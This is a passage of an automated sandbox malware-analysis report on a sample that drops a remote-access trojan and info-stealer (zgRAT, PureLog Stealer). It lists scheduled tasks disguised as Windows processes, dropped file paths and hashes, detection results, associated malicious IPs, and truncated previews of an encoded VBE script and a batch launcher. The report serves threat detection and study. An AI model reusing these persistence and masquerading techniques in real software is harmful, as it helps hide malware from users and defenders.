                                  • Number of executed functions: 201
                                  • Number of non-executed functions: 222
                                  Cookbook Comments:
                                  • Found application associated with file extension: .exe

                                  Warnings

                                  • Exclude process from analysis (whitelisted): WmiPrvSE.exe
                                  • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                  • Execution Graph export aborted for target GargantuanS.exe, PID 7524 because it is empty
                                  • Execution Graph export aborted for target nhxnqwkhmssh.exe, PID 7844 because it is empty
                                  • Not all processes where analyzed, report is missing behavior information
                                  • Report size exceeded maximum capacity and may have missing behavior information.
                                  • Report size exceeded maximum capacity and may have missing disassembly code.
                                  • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                  • Report size getting too big, too many NtCreateKey calls found.
                                  • Report size getting too big, too many NtOpenKeyEx calls found.
                                  • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                  • Report size getting too big, too many NtQueryValueKey calls found.
                                  • Report size getting too big, too many NtReadVirtualMemory calls found.

                                  Simulations

                                  Behavior and APIs

                                  TimeTypeDescription
                                  09:32:03Task SchedulerRun new task: KZcLqgnLvRf path: "C:\Program Files (x86)\reference assemblies\Microsoft\Framework\KZcLqgnLvRf.exe"
                                  09:32:03Task SchedulerRun new task: KZcLqgnLvRfK path: "C:\Program Files (x86)\reference assemblies\Microsoft\Framework\KZcLqgnLvRf.exe"
                                  09:32:03Task SchedulerRun new task: WmiPrvSE path: "C:\Recovery\WmiPrvSE.exe"
                                  09:32:03Task SchedulerRun new task: WmiPrvSEW path: "C:\Recovery\WmiPrvSE.exe"
                                  09:32:05Task SchedulerRun new task: RuntimeBroker path: "C:\Recovery\RuntimeBroker.exe"
                                  09:32:05Task SchedulerRun new task: RuntimeBrokerR path: "C:\Recovery\RuntimeBroker.exe"
                                  10:32:00API Interceptor21x Sleep call for process: powershell.exe modified
                                  10:32:08API Interceptor147287x Sleep call for process: KZcLqgnLvRf.exe modified
                                  10:32:38API Interceptor78x Sleep call for process: WmiPrvSE.exe modified
                                  10:32:38API Interceptor439671x Sleep call for process: winlogon.exe modified
                                  10:32:39API Interceptor340380x Sleep call for process: dialer.exe modified

                                  Joe Sandbox View / Context

                                  IPs

                                  No context

                                  Domains

                                  No context

                                  ASNs

                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                  SPEEDYLINERUNMdpQecbkg.elfGet hashmaliciousMiraiBrowse
                                  • 213.108.22.242
                                  gZo873g1iv.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                  • 176.123.169.110
                                  bXKYLbAIza.exeGet hashmaliciousDCRat, zgRATBrowse
                                  • 176.123.168.238
                                  0rsj8JbJNU.dllGet hashmaliciousAmadeyBrowse
                                  • 176.123.171.210
                                  0rsj8JbJNU.dllGet hashmaliciousAmadeyBrowse
                                  • 176.123.171.210
                                  sora.arm.elfGet hashmaliciousMiraiBrowse
                                  • 176.109.66.246
                                  1SSHp4VKId.elfGet hashmaliciousMiraiBrowse
                                  • 91.219.224.229
                                  sora.x86.elfGet hashmaliciousMiraiBrowse
                                  • 176.109.66.255
                                  g1HGcyBXTj.elfGet hashmaliciousMiraiBrowse
                                  • 91.219.224.244
                                  suO9QdfkQa.elfGet hashmaliciousMiraiBrowse
                                  • 213.108.22.230

                                  JA3 Fingerprints

                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                  c12f54a3f91dc7bafd92cb59fe009a351N9LML9w7L.exeGet hashmaliciousNeshta, XWormBrowse
                                  • 176.123.168.151
                                  VgbVS3yBhI.exeGet hashmaliciousNeshta, XWormBrowse
                                  • 176.123.168.151
                                  J7tu5vP0fA.exeGet hashmaliciousNeshta, XWormBrowse
                                  • 176.123.168.151
                                  NECOv1fTXe.exeGet hashmaliciousNeshta, XWormBrowse
                                  • 176.123.168.151
                                  ZvZ746X318.exeGet hashmaliciousNeshta, XWormBrowse
                                  • 176.123.168.151
                                  PdMBQWIwWE.exeGet hashmaliciousAsyncRAT, Neshta, VenomRATBrowse
                                  • 176.123.168.151
                                  xdNhIDAiy6.exeGet hashmaliciousNeshtaBrowse
                                  • 176.123.168.151
                                  ELq1Ghub8k.exeGet hashmaliciousAsyncRAT, Neshta, VenomRATBrowse
                                  • 176.123.168.151
                                  l1aiKGBq3S.exeGet hashmaliciousNeshta, XWormBrowse
                                  • 176.123.168.151
                                  JaTAKnq6PL.exeGet hashmaliciousNeshta, XWormBrowse
                                  • 176.123.168.151

                                  Dropped Files

                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                  C:\Users\user\Desktop\IkSFhrpY.loghfGA6tjyxY.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                    3m7cmtctck.exeGet hashmaliciousPureLog Stealer, zgRATBrowse
                                      jXtV6KO1A7.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                        fDTPlvsGfH.exeGet hashmaliciousDCRatBrowse
                                          W4tW72sfAD.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                            8CDSiIApNr.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                              3otr19d5Oq.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                idYLOQOVSi.exeGet hashmaliciousDCRatBrowse
                                                  ZAF4Dsu737.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                    mbsPX9l9Ge.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse

                                                      Created / dropped Files

                                                      C:\PerfDll\c2HM4VxGuBBIXOzYQncd9IeSwfaF3.vbe

                                                      Download File
                                                      Process:C:\Users\user\AppData\Local\Temp\GargantuaN.exe
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):202
                                                      Entropy (8bit):5.811991669101916
                                                      Encrypted:false
                                                      SSDEEP:6:GowqK+NkLzWbH9WF08nZNDd3RL1wQJRWrP3Vmz71:GpMCzWL74d3XBJxX1
                                                      MD5:E58F54961290891BA8DD349131192542
                                                      SHA1:E95EE8B62C8ED496FCC87CF0BAE3290392A4196E
                                                      SHA-256:9B129787A354C2400B13F6A3ADC4B22BB4EFE21B88E1A04E7E5DC6D093E421A8
                                                      SHA-512:5914AF838FA227A64705EF2AFBBC10B19A66D121E177EED8215A69F05CDFE7406AC8CF87897607E337A8E13B66A6D1ED091B2AA6B841E264A935E9A7BACA21FE
                                                      Malicious:true
                                                      Antivirus:
                                                      • Antivirus: Avira, Detection: 100%
                                                      Preview:#@~^sQAAAA==j.Y~q/4?t.V^~',Z.+mYn6(L+1O`r.?1.rwDRUtnVsE*@#@&.U^DbwO UV+n2v*T!Zb@#@&j.Y,./4?4nV^PxP;DnCD+r(%+1Y`r.jmMkaY ?4n^VE#@#@&.ktj4.VV ]!x~J;lJnnM0GVVJz7-3.N-:Uj\qWLkz"mc4lDESPZ~,0CVdn1zcAAA==^#~@.

                                                      C:\PerfDll\hyperProviderSavesinto.exe

                                                      Download File
                                                      Process:C:\Users\user\AppData\Local\Temp\GargantuaN.exe
                                                      File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                      Category:dropped
                                                      Size (bytes):1968128
                                                      Entropy (8bit):7.554175262094728
                                                      Encrypted:false
                                                      SSDEEP:24576:wR5wlxvspUb0qtT2YSCeBJxs56NAFUhOcfMxHoktN/c61+bURfTj/PlzBCpEwxl5:wUPKCeJxkBceok7WURfTj/j9wDmm
                                                      MD5:3997D7D058AF3C1B6C9ABB57F6FA1F2A
                                                      SHA1:CD38C3EB67E2D09445EB39B66A69B31673C2360C
                                                      SHA-256:B19C5E3261D05C95756D6452048448C4AB30D3179F90CA714DE39ECE0CD72D99
                                                      SHA-512:AD53432C8F8309701E0DC2BA7C885F5088EE69C3073E9D1DE4A3C75CB3C1AF845B43D0A8512AF58BCD425A831EC4F4BCF74FE3918956527DB5A96A88FC003A36
                                                      Malicious:true
                                                      Yara Hits:
                                                      • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\PerfDll\hyperProviderSavesinto.exe, Author: Joe Security
                                                      • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\PerfDll\hyperProviderSavesinto.exe, Author: Joe Security
                                                      Antivirus:
                                                      • Antivirus: Avira, Detection: 100%
                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                      • Antivirus: ReversingLabs, Detection: 88%
                                                      • Antivirus: Virustotal, Detection: 74%, Browse
                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...u..e................................. ... ....@.. .......................`............@.....................................K.... ..p....................@....................................................... ............... ..H............text...$.... ...................... ..`.rsrc...p.... ......................@....reloc.......@......................@..B........................H...........<.......s......p@..I........................................0..........(.... ........8........E....N...*...).......8I...(.... ....~u...{|...:....& ....8....*(.... ....~u...{....:....& ....8....(.... ....8........0.......... ........8........E............S...........8)...~....:.... ....~u...{....9....& ....8.......... ....~u...{....:....& ....8....~....(H... .... .... ....s....~....(L....... ....8^...r...ps....z*....~....(P...~....(T... ....?.... ....8&.....(....*

                                                      C:\PerfDll\vvkzdvmSUM14jiAzc.bat

                                                      Download File
                                                      Process:C:\Users\user\AppData\Local\Temp\GargantuaN.exe
                                                      File Type:ASCII text, with CRLF line terminators
                                                      Category:dropped
                                                      Size (bytes):87
                                                      Entropy (8bit):5.275499456592444
                                                      Encrypted:false
                                                      SSDEEP:3:oHQzAqPmIJJG8OrAXIrXul/10OA:kQsfIHGBUYrXC/1BA
                                                      MD5:B23A11797069052E51F71DDF9BCFC4F2
                                                      SHA1:08C3C1D85CB102A92843C2ED82CCCDD8CA26026D
                                                      SHA-256:E026F1D8CED262BF0921EBC7BBC797AA65F3E6E2AD8A62B9F4566CC4AA540A43
                                                      SHA-512:E8C8EF9EF32A415567E27EB467A992868FB836A52CE0F74348CFC3A590BFA3B5E4AC4E37725D0C2B572EEBB42F6BA33DDCB7B513359C6392B71914B7BF03BA26
                                                      Malicious:false
                                                      Preview:%XUeuqrfVNITzMR%%BhrujCqtlkrcOI%..%CWLwux%"C:\PerfDll/hyperProviderSavesinto.exe"%kZbJ%

                                                      C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe

                                                      Download File
                                                      Process:C:\PerfDll\hyperProviderSavesinto.exe
                                                      File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                      Category:dropped
                                                      Size (bytes):1968128
                                                      Entropy (8bit):7.554175262094728
                                                      Encrypted:false
                                                      SSDEEP:24576:wR5wlxvspUb0qtT2YSCeBJxs56NAFUhOcfMxHoktN/c61+bURfTj/PlzBCpEwxl5:wUPKCeJxkBceok7WURfTj/j9wDmm
                                                      MD5:3997D7D058AF3C1B6C9ABB57F6FA1F2A
                                                      SHA1:CD38C3EB67E2D09445EB39B66A69B31673C2360C
                                                      SHA-256:B19C5E3261D05C95756D6452048448C4AB30D3179F90CA714DE39ECE0CD72D99
                                                      SHA-512:AD53432C8F8309701E0DC2BA7C885F5088EE69C3073E9D1DE4A3C75CB3C1AF845B43D0A8512AF58BCD425A831EC4F4BCF74FE3918956527DB5A96A88FC003A36
                                                      Malicious:true
                                                      Yara Hits:
                                                      • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe, Author: Joe Security
                                                      • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe, Author: Joe Security
                                                      • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe, Author: Joe Security
                                                      • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe, Author: Joe Security
                                                      • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe, Author: Joe Security
                                                      • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe, Author: Joe Security
                                                      Antivirus:
                                                      • Antivirus: Avira, Detection: 100%
                                                      • Antivirus: Avira, Detection: 100%
                                                      • Antivirus: Avira, Detection: 100%
                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                      • Antivirus: ReversingLabs, Detection: 88%
                                                      • Antivirus: Virustotal, Detection: 74%, Browse
                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...u..e................................. ... ....@.. .......................`............@.....................................K.... ..p....................@....................................................... ............... ..H............text...$.... ...................... ..`.rsrc...p.... ......................@....reloc.......@......................@..B........................H...........<.......s......p@..I........................................0..........(.... ........8........E....N...*...).......8I...(.... ....~u...{|...:....& ....8....*(.... ....~u...{....:....& ....8....(.... ....8........0.......... ........8........E............S...........8)...~....:.... ....~u...{....9....& ....8.......... ....~u...{....:....& ....8....~....(H... .... .... ....s....~....(L....... ....8^...r...ps....z*....~....(P...~....(T... ....?.... ....8&.....(....*

                                                      C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\e3a74901549792

                                                      Download File
                                                      Process:C:\PerfDll\hyperProviderSavesinto.exe
                                                      File Type:ASCII text, with very long lines (372), with no line terminators
                                                      Category:dropped
                                                      Size (bytes):372
                                                      Entropy (8bit):5.8403681581324705
                                                      Encrypted:false
                                                      SSDEEP:6:Rtl3vcN87w3UMBTqc+pQdhEZ3JIBh6b5gkKyYl8aHYfykiCSoEfYH5n:RTcN87m7Vqc0Qdhm36Bcb5gkKa3fRUk5
                                                      MD5:2FBD38F1B2C42F8FDA17DE88950BAEEA
                                                      SHA1:16420569F041ADAF0A8A666EE5F02E71E9115B78
                                                      SHA-256:5AD54B6BAB2D4B20373FC46B8447FDDCE47D0C0DD51B24340054E7CCDD511B1E
                                                      SHA-512:33F00E682FF99CE15C590F81945368E34ED7F0348429C2F44F32B7BF4D77ABAD6B4DB41351873FBACC6DC884B8087C3DDC4A82107E94DA01557EB2D15761E56B
                                                      Malicious:false
                                                      Preview:qavOs2MXQUSot5jZ0LiOzlCGbBxN19Z9fjzCOzrb41jlHGPeb5kZGYhEXpwrF8fR4TJJGhKAdHT8Bb9UvSw5ZA3HCuojCAV6WSqy7FY3vj59FiD6pc5xLj24ZBGW3k8dwWmtvKWq43K0E4Cdrr3kEiuwZvY58CAKkbMs6TLfFP2SYBzf9noLqYZNmzT9wbr22APmrUgXgYeypbXY526VXyeMC8FH9LsoiAZYwNypGRpR3kiLc5D3eVeEgDjsOZYUp0QpB8msEQPGIMTca4pEIzJMfV2tnFbq3UlDT2JdTUzOGY5TuHRTuTL0qEKqF2F8ziMykPJiuLuxA5GGZi9fyH6jIvWOsdXaP0YhLHte8tjijY0v8DQh

                                                      C:\ProgramData\celaehnmjins\nhxnqwkhmssh.exe

                                                      Download File
                                                      Process:C:\Users\user\AppData\Local\Temp\GargantuanS.exe
                                                      File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                      Category:dropped
                                                      Size (bytes):5475840
                                                      Entropy (8bit):6.521499958209298
                                                      Encrypted:false
                                                      SSDEEP:98304:v1ECDUbTBOrBu3mhZvUvpldnwq4b17j1EQ/AVEkteJ5ymz6vZL50Xpa:vVUgBu3sUPdob17GQfk45ymGvZt
                                                      MD5:7A568EF3F46D369F3D3FFD68FDF68573
                                                      SHA1:203042A80812E2208C45AA95900172550994D80D
                                                      SHA-256:BB895B0D8E684A48F0E9564B9D7E1323087D4F4664DA134A28A54338BFAB4EA0
                                                      SHA-512:4F08CDD7021BD9AC1922D1252DBF7A2F26C689574FDA7C5A0EAC7DDC1F1138F3A51770B23F5EA23458611851E410FAF5468A7209437E354452C47C13F2BB3ECD
                                                      Malicious:true
                                                      Antivirus:
                                                      • Antivirus: Avira, Detection: 100%
                                                      • Antivirus: ReversingLabs, Detection: 81%
                                                      • Antivirus: Virustotal, Detection: 61%, Browse
                                                      Preview:MZx.....................@...................................x...hr......!..L.!This program cannot be run in DOS mode.$..PE..d.....e.........."...........R.....@..........@..............................T...........`.....................................................<.....S.P.....S...............S.x...............................(.......8...........X...x............................text............................... ..`.rdata...'.......(..................@..@.data....R.......R.................@....pdata........S.......S.............@..@.00cfg........S.......S.............@..@.tls..........S.......S.............@....rsrc...P.....S.......S.............@..@.reloc..x.....S.......S.............@..B........................................................................................................................................................................................................................................................................................................

                                                      C:\Recovery\24dbde2999530e

                                                      Download File
                                                      Process:C:\PerfDll\hyperProviderSavesinto.exe
                                                      File Type:ASCII text, with very long lines (614), with no line terminators
                                                      Category:dropped
                                                      Size (bytes):614
                                                      Entropy (8bit):5.869847775662665
                                                      Encrypted:false
                                                      SSDEEP:12:Nv3kTqjP4+ICeVpJRNYeskT6fr/8Nr2c7gn/umSjt/5fhziUtx65tG16dEa:F3k+HI5fNYIe62Wg/umSR/+ux65aLa
                                                      MD5:19CBF5DB2E33EA2352F8D7F174EC29FA
                                                      SHA1:77DF3CEE51970122409E18B22D78CA9D67DA7697
                                                      SHA-256:F718A294F9B10D4F09ACE961A311CFFE5C6CEF5A68E293EA938ECC3664484143
                                                      SHA-512:DAE739E10036B4F8DE417BAA78D18876778DCF56FB1460497B0D167F86835EFA4F0CEF61CDA40B8519F7DCC93E3992A688401AD4DAEAE9D2BC166ABB75767251
                                                      Malicious:false
                                                      Preview:Y74fdXBQrs2pdxHUD1g6ekkGj02BVmrwP8fxP48wbbJITFCXf3VttCHyWx5ne95EAGZeRTEI3tfDacxeyfgbR8CN1rab8URbfFHMphFLyMz9hDY4Aay9ddwCDMnk3nKibDiUVkzRZUnEIDpxSgahgS8BSEId3eSLCQhdfDiZlhkI0r3AgzSWMmCJFgCQbVX4CbC2fMSO7A59szLkKI7DM59aNYX8BS8QJpGYpBfThDZLqCbQUbGTXUrGcmoGyTNpCp0Ctw5JmogJgxtK7HokMo2y896DWYeNztIBMZhhg6qtyhjo2dJrpndYwBDt01wOJSTwos8hkGEP7IAaaRL2OxiMQuOLVxroKckfOwAJfmGjjNbnAnTjq3AVuHg4dxMwZZFfifMnRBXmr9nDSkKseH7QbOvGQFpsZTJJI6FfbpSpgYouedm3meSRczDTtFWLVoMXzd4WfpRyzStDkAmxdwF5B2rS3wvVTGU1LQ5AiPY6MdcKF9sscjsiiRW7wmds35fs712UFmPNYJshagM4DD2uYvS438N6wpDR7tMOGXm0TeJZiygPZjo0CvUMi8bHYTbtFbjqU8xqaCa3l2VEb7hNAMOMZApI6fcADa

                                                      C:\Recovery\9e8d7a4ca61bd9

                                                      Download File
                                                      Process:C:\PerfDll\hyperProviderSavesinto.exe
                                                      File Type:ASCII text, with very long lines (553), with no line terminators
                                                      Category:dropped
                                                      Size (bytes):553
                                                      Entropy (8bit):5.893036491694996
                                                      Encrypted:false
                                                      SSDEEP:12:60OyjJ+8unPIn+VzJzs5ZQexwtiV0jBVkUukEHoS:60OyjA8unPI+Ve5qex7C8FkEIS
                                                      MD5:4521F42FB8C267F3E475D816413D0BD2
                                                      SHA1:B1D346E3CF33D84960E119706D5C6E28BF84F243
                                                      SHA-256:B135560624CB2C1A7AB33D3B630F7D4E988880DD09353FEDADD3627A05F29B27
                                                      SHA-512:91EB17B0F0A676FAC40D671FF6F785534FC4284DBDA4E30D4155B91CE0BA6C1BD6BC01E34C40AF79E27D1EF151CF5D5BEA9C8488E9D80A0BDD4D0965928D104C
                                                      Malicious:false
                                                      Preview:Y9u4lQoM0gpqq5ic4kE4RtPzrOaJ8rYCGKNn44SnKE8x2czmWz44dKQou5MW0fOIInkgs4i9SatNvc6OYxwJxei54i39r6xo0zpP2T3bR4mCaC3S887CsEVnEomJBjSWnEX5wrWF3V221gf1pkAt8u6veBKOruasmQZWp7fQm2IXMdviJueaijX3ImbvhIXJ4KQlGIMrFuHGliiAPlE6PAJD2gODfttee9dCMKbAixUxbRRjDaf5Da43AMsk4ILVAnlmEgyFJEYbqVllOo9ENyaEEjC9b1FZl8xyppehmav9CcNolHWQJGHMMhhedyoS880riw6jJccxCbBmWXYTezQe0lmHH9DyvdADmfFzKwHqoUKuf5IGZUxJsV07KybJZnBjb8A1SiIssjzga1mM17Ybp1UQoIpWV7RBSkTh5Qy0LFbIfUgSLPRbOk3jntMJ3wWuSyO0iFRlJiPjaMvUlWKGqzxrrt3LEo7Zsq0rFquG7qSqVUJb81hglQDcBgIyLGgekz0tWEO5mDI9hGVWkcNMGaybnXpjh551JxFgd

                                                      C:\Recovery\RuntimeBroker.exe

                                                      Download File
                                                      Process:C:\PerfDll\hyperProviderSavesinto.exe
                                                      File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                      Category:dropped
                                                      Size (bytes):1968128
                                                      Entropy (8bit):7.554175262094728
                                                      Encrypted:false
                                                      SSDEEP:24576:wR5wlxvspUb0qtT2YSCeBJxs56NAFUhOcfMxHoktN/c61+bURfTj/PlzBCpEwxl5:wUPKCeJxkBceok7WURfTj/j9wDmm
                                                      MD5:3997D7D058AF3C1B6C9ABB57F6FA1F2A
                                                      SHA1:CD38C3EB67E2D09445EB39B66A69B31673C2360C
                                                      SHA-256:B19C5E3261D05C95756D6452048448C4AB30D3179F90CA714DE39ECE0CD72D99
                                                      SHA-512:AD53432C8F8309701E0DC2BA7C885F5088EE69C3073E9D1DE4A3C75CB3C1AF845B43D0A8512AF58BCD425A831EC4F4BCF74FE3918956527DB5A96A88FC003A36
                                                      Malicious:true
                                                      Yara Hits:
                                                      • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Recovery\RuntimeBroker.exe, Author: Joe Security
                                                      • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Recovery\RuntimeBroker.exe, Author: Joe Security
                                                      Antivirus:
                                                      • Antivirus: Avira, Detection: 100%
                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                      • Antivirus: ReversingLabs, Detection: 88%
                                                      • Antivirus: Virustotal, Detection: 74%, Browse
                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...u..e................................. ... ....@.. .......................`............@.....................................K.... ..p....................@....................................................... ............... ..H............text...$.... ...................... ..`.rsrc...p.... ......................@....reloc.......@......................@..B........................H...........<.......s......p@..I........................................0..........(.... ........8........E....N...*...).......8I...(.... ....~u...{|...:....& ....8....*(.... ....~u...{....:....& ....8....(.... ....8........0.......... ........8........E............S...........8)...~....:.... ....~u...{....9....& ....8.......... ....~u...{....:....& ....8....~....(H... .... .... ....s....~....(L....... ....8^...r...ps....z*....~....(P...~....(T... ....?.... ....8&.....(....*

                                                      C:\Recovery\WmiPrvSE.exe

                                                      Download File
                                                      Process:C:\PerfDll\hyperProviderSavesinto.exe
                                                      File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                      Category:dropped
                                                      Size (bytes):1968128
                                                      Entropy (8bit):7.554175262094728
                                                      Encrypted:false
                                                      SSDEEP:24576:wR5wlxvspUb0qtT2YSCeBJxs56NAFUhOcfMxHoktN/c61+bURfTj/PlzBCpEwxl5:wUPKCeJxkBceok7WURfTj/j9wDmm
                                                      MD5:3997D7D058AF3C1B6C9ABB57F6FA1F2A
                                                      SHA1:CD38C3EB67E2D09445EB39B66A69B31673C2360C
                                                      SHA-256:B19C5E3261D05C95756D6452048448C4AB30D3179F90CA714DE39ECE0CD72D99
                                                      SHA-512:AD53432C8F8309701E0DC2BA7C885F5088EE69C3073E9D1DE4A3C75CB3C1AF845B43D0A8512AF58BCD425A831EC4F4BCF74FE3918956527DB5A96A88FC003A36
                                                      Malicious:true
                                                      Yara Hits:
                                                      • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Recovery\WmiPrvSE.exe, Author: Joe Security
                                                      • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Recovery\WmiPrvSE.exe, Author: Joe Security
                                                      Antivirus:
                                                      • Antivirus: Avira, Detection: 100%
                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                      • Antivirus: ReversingLabs, Detection: 88%
                                                      • Antivirus: Virustotal, Detection: 74%, Browse
                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...u..e................................. ... ....@.. .......................`............@.....................................K.... ..p....................@....................................................... ............... ..H............text...$.... ...................... ..`.rsrc...p.... ......................@....reloc.......@......................@..B........................H...........<.......s......p@..I........................................0..........(.... ........8........E....N...*...).......8I...(.... ....~u...{|...:....& ....8....*(.... ....~u...{....:....& ....8....(.... ....8........0.......... ........8........E............S...........8)...~....:.... ....~u...{....9....& ....8.......... ....~u...{....:....& ....8....~....(H... .... .... ....s....~....(L....... ....8^...r...ps....z*....~....(P...~....(T... ....?.... ....8&.....(....*

                                                      C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\KZcLqgnLvRf.exe.log

                                                      Download File
                                                      Process:C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe
                                                      File Type:CSV text
                                                      Category:dropped
                                                      Size (bytes):847
                                                      Entropy (8bit):5.354334472896228
                                                      Encrypted:false
                                                      SSDEEP:24:ML9E4KQwKDE4KGKZI6KhPKIE4TKBGKoZAE4KKUNb:MxHKQwYHKGSI6oPtHTHhAHKKkb
                                                      MD5:9F9FA9EFE67E9BBD165432FA39813EEA
                                                      SHA1:6FE9587FB8B6D9FE9FA9ADE987CB8112C294247A
                                                      SHA-256:4488EA75E0AC1E2DEB4B7FC35D304CAED2F877A7FB4CC6B8755AE13D709CF37B
                                                      SHA-512:F4666179D760D32871DDF54700D6B283AD8DA82FA6B867A214557CBAB757F74ACDFCAD824FB188005C0CEF3B05BF2352B9CA51B2C55AECF762468BB8F5560DB3
                                                      Malicious:false
                                                      Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Configuration\915c1ee906bd8dfc15398a4bab4acb48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Xml\db3df155ec9c0595b0198c4487f36ca1\System.Xml.ni.dll",0..

                                                      C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\hyperProviderSavesinto.exe.log

                                                      Download File
                                                      Process:C:\PerfDll\hyperProviderSavesinto.exe
                                                      File Type:ASCII text, with CRLF line terminators
                                                      Category:dropped
                                                      Size (bytes):1830
                                                      Entropy (8bit):5.3661116947161815
                                                      Encrypted:false
                                                      SSDEEP:48:MxHKQwYHKGSI6oPtHTHhAHKKkrJHV1qHGIs0HKGHKlT4vHNpv:iqbYqGSI6oPtzHeqKkt1wmj0qGqZ4vtd
                                                      MD5:F3475F6FF1F713C7C9DAACC1DF623E58
                                                      SHA1:AED39B5923CCC56514F33B73DF64A13706CE0DAE
                                                      SHA-256:3AE4E8E8ADBD758B6E39EA3D7B8E680F3160F6E5D48DAF1F0419236F1978CDCE
                                                      SHA-512:65B0309ABFBEFD2A749F3DEDBEE74CF5160BF42049C8A67AE30DB786092EC3553F1C8F16C5C40004650CB3926C84F061E37C796CA92266F582B3E48D5A237C32
                                                      Malicious:false
                                                      Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Configuration\915c1ee906bd8dfc15398a4bab4acb48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Xml\db3df155ec9c0595b0198c4487f36ca1\System.Xml.ni.dll",0..2,"System.Security, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyT

                                                      C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                      Download File
                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):64
                                                      Entropy (8bit):1.1940658735648508
